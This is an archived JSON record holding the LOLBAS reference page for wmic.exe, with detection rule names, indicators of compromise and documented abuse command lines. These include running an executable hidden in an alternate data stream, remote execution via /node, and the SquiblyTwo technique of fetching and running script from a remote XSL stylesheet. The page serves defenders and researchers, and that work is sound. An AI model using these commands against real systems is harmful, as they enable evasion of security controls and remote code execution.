{
	"id": "004d7e8c-990b-450e-9e1b-ccdb4c9d7f9d",
	"created_at": "2026-04-06T00:08:17.043659Z",
	"updated_at": "2026-04-10T03:21:14.561751Z",
	"deleted_at": null,
	"sha1_hash": "a314e0e76a3b560238b10c2145e0225f9061ab55",
	"title": "Wmic on LOLBAS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 65839,
	"plain_text": "Wmic on LOLBAS\r\nArchived: 2026-04-05 14:29:08 UTC\r\nThe WMI command-line (WMIC) utility provides a command-line interface for Windows Management Instrumentation (WMI). Microsoft has deprecated WMIC; on recent Windows 11 builds it is distributed as an optional Feature on Demand rather than installed by default.\r\nPaths:\r\nC:\\Windows\\System32\\wbem\\wmic.exe\r\nC:\\Windows\\SysWOW64\\wbem\\wmic.exe\r\nResources:\r\nhttps://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory\r\nhttps://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html\r\nhttps://twitter.com/subTee/status/986234811944648707\r\nAcknowledgements:\r\nCasey Smith (@subtee)\r\nAvihay Eldad (@AvihayEldad)\r\nDetections:\r\nSigma: image_load_wmic_remote_xsl_scripting_dlls.yml\r\nSigma: proc_creation_win_wmic_xsl_script_processing.yml\r\nSigma: proc_creation_win_wmic_squiblytwo_bypass.yml\r\nSigma: proc_creation_win_wmic_eventconsumer_creation.yml\r\nElastic: defense_evasion_suspicious_wmi_script.toml\r\nElastic: persistence_via_windows_management_instrumentation_event_subscription.toml\r\nElastic: defense_evasion_suspicious_managedcode_host_process.toml\r\nSplunk: xsl_script_execution_with_wmic.yml\r\nSplunk: remote_wmi_command_attempt.yml\r\nSplunk: remote_process_instantiation_via_wmi.yml\r\nSplunk: process_execution_via_wmi.yml\r\nBlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules\r\nIOC: Wmic retrieving scripts from remote system/Internet location\r\nIOC: DotNet CLR libraries loaded into wmic.exe\r\nIOC: DotNet CLR Usage Log - wmic.exe.log\r\nIOC: wmiprvse.exe writing files\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Wmic/\r\nPage 1 of 4\r\nAlternate data streams\r\n1. Execute a .EXE file stored as an Alternate Data Stream (ADS)\r\nwmic.exe process call create \"C:\\Windows\\Temp\\file.ext:program.exe\"\r\nUse case\r\nExecute a binary hidden in an NTFS alternate data stream to evade defensive countermeasures\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1564.004: NTFS File Attributes\r\nTags\r\nExecute: EXE\r\nExecute\r\n1. Execute calc.exe from wmic\r\nwmic.exe process call create \"cmd /c c:\\windows\\system32\\calc.exe\"\r\nUse case\r\nExecute a binary via wmic to evade defensive countermeasures\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218: System Binary Proxy Execution\r\nTags\r\nExecute: CMD\r\n2. Execute a binary (here calc.exe) on the remote system named by the /node switch.\r\nwmic.exe /node:\"192.168.0.1\" process call create \"cmd /c c:\\windows\\system32\\calc.exe\"\r\nUse case\r\nExecute binary on a remote system\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218: System Binary Proxy Execution\r\nTags\r\nExecute: CMD\r\nExecute: Remote\r\n3. Execute JScript or VBScript embedded in an XSL stylesheet fetched over HTTP(S) (the SquiblyTwo technique). The /format switch accepts a URL, and any script block in the stylesheet runs while wmic transforms its output.\r\nwmic.exe process get brief /format:\"https://www.example.org/file.xsl\"\r\nUse case\r\nExecute script fetched from an Internet location\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218: System Binary Proxy Execution\r\nTags\r\nExecute: XSL\r\nExecute: Remote\r\n4. Execute JScript or VBScript embedded in an XSL stylesheet loaded from a remote SMB share.\r\nwmic.exe process get brief /format:\"\\\\servername\\C$\\Windows\\Temp\\file.xsl\"\r\nUse case\r\nExecute script from remote system\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218: System Binary Proxy Execution\r\nTags\r\nExecute: XSL\r\nExecute: Remote\r\nCopy\r\n1. Copy a file from source to destination. Backslashes in the WQL Name filter and in the Copy argument are doubled because backslash is the escape character in WQL string literals.\r\nwmic.exe datafile where \"Name='C:\\\\windows\\\\system32\\\\calc.exe'\" call Copy \"C:\\\\users\\\\public\\\\calc.exe\"\r\nUse case\r\nCopy file.\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://lolbas-project.github.io/lolbas/Binaries/Wmic/"
	],
	"report_names": [
		"Wmic"
	],
	"threat_actors": [],
	"ts_created_at": 1775434097,
	"ts_updated_at": 1775791274,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a314e0e76a3b560238b10c2145e0225f9061ab55.pdf",
		"text": "https://archive.orkl.eu/a314e0e76a3b560238b10c2145e0225f9061ab55.txt",
		"img": "https://archive.orkl.eu/a314e0e76a3b560238b10c2145e0225f9061ab55.jpg"
	}
}